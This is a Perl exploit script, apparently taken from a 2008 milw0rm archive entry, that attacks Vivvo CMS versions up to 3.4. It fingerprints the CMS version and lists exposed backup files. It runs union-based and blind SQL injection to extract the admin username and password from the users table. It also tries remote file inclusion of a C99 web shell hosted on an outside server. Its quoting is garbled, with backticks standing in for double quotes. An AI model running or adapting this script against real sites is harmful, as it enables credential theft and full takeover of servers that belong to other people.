Vivvo CMS <= 3.4 Multiple Vulnerabilities Destroyer Exploit#!/usr/bin/perl

#Vivvo CMS Destroyer
#uxmal666@gmail.com
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------

print `\n                           Vivvo CMS Destroyer By Xianur0\n`;

#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
  use LWP::UserAgent;
  use Switch;
  my $path = $ARGV[0];
  $path = shift || &amp;uso;
sub uso { print `\nUse: vivvo.pl [URI to Vivvo CMS]\n`; exit;}
  $ua = LWP::UserAgent->new;
  $ua->agent(`Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17`);
  $req = HTTP::Request->new(GET => $path.`/feed.php?output_type=rss`);
  $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
  $res = $ua->request($req);
  if ($res->is_success &amp;&amp; $res->content =~ `generator`) {
&amp;parser($res->content);
  } else {
  $req = HTTP::Request->new(GET => $path.`/index.php?feed`);
  $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
  $res = $ua->request($req);
  if ($res->is_success &amp;&amp; $res->content =~ `generator`) {
&amp;parser($res->content);
  }
    else { print `\nError getting data!\n`; exit;}
  }

&amp;backups;


sub parser {
my @datos = split('<generator>Vivvo CMS ', $_[0]);
my @version = split('</generator>', $datos[1]);
$version = $version[0];
if($version[0] == ``) {
my @datos = split('<meta name=`generator` content=`Vivvo ', $_[0]);
my @version = split('` />', $datos[1]);
$version = $version[0];
}
print `Version: `.$version.`\n`;
if($version < `4`) { print `Outdated version of Vivvo CMS!\n`; &amp;desactualizada($version);}
}

sub backups {
  $req = HTTP::Request->new(GET => `$path/backup`);
  $req->header('Accept' => 'text/xml');
  $res = $ua->request($req);
  if ($res->is_success) {
if($res->content =~ `Index of /backup`) {
print `\n              Backups:\n`;
my @datos = split('<a href=`', $res->content);
$datos[0] = ``;
foreach $archivos (@datos) {
my @archivo = split('`>', $archivos);
if($archivo[0] !~ /\?/){print $archivo[0].`\n`; }
}
print `\nUnprotected Directory: $path/backup\n`;
  }
}
}

sub rfi {
$vuln = $_[0];
  $req = HTTP::Request->new(GET => `$path/$vuln=$SHELL?`);
  $req->header('Accept' => 'text/xml');
  $res = $ua->request($req);
  if ($res->is_success) {
if($res->content =~ $textshell) {
print `RFI Detected!: $path/$vuln=$SHELL?`;
  }
}}

sub sql {
$exploit = `pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=1`;
  $req = HTTP::Request->new(GET => `$path/$exploit`);
  $req->header('Accept' => 'text/xml');
  $res = $ua->request($req);
  if ($res->is_success) {
print `SQL Injection Generated: $path$exploit`;
}
}

sub blind {
for($i=1; $i<32;$i++) {
for($o=30; $o<102;$o++) {
$injection = `$path/index.php?category=/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),`.$i.`,1))=`.$o;
  $req = HTTP::Request->new(GET => $injection);
  $req->header('Accept' => 'text/xml');
  $res = $ua->request($req);
  if ($res->is_success) {
if($res->content != ``) {
print `Blind Done Correctly!: $injection`;
  }
}
}}}

sub desactualizada {
$version = $_[0];
  switch ($version) {
    case `3.4`    { print `Blind SQL Injection trying ....\n`; &amp;blind; print `Intentando RFI....\n`; &amp;rfi('include/db_conn.php?root');}
    case `3.2`    { print `RFI trying ....\n`; &amp;rfi('index.php?classified_path'); print `SQL Injection....\n`; &amp;sql;}
        else { print `There is no registration for this Exploit Version! : (\n`;}
    }
}

# milw0rm.com [2008-10-19]